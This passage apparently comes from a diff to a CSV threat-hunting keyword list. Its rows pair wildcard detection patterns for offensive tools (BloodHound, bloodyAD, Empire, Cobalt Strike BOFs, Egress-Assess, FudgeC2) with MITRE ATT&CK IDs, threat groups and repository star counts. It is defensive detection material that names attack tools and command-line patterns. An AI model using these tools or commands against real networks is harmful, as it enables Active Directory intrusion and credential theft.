Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. 
with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8799","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" -"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"*bloodhound --no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.ad.*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.bin*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*bloodhound.enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*bloodhound.py *","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*bloodhound.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bloodhound_output*/dev/null*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*bloodhound_output_dconly_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*BloodHoundAD*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. 
with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*BloodHoundAD*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "*BloodHoundGraphToGoFetchPath*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*bloodhound-import -du neo4j -dp *.json*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*BloodHound-master*","offensive_tool_keyword","bloodhound","A 
Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-master*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*BloodHound-modified.ps1*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*bloodhound-python*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*bloodhound-quickwin -u * -p *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bloodhound-quickwin-main*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" -"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" -"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" -"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-09-01T09:12:45Z","2021-10-11T15:07:26Z" +"*bloodyAD -*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD.py*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*bloodyAD-main*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" "*bluekeepscanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" "*bm90cmVkYW1lY2hlYXRzdG93aW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bob@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*BOF prototype works!*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" -"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*bof*/CredEnum/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOF.NET.git*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*BOF.NET-main*","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
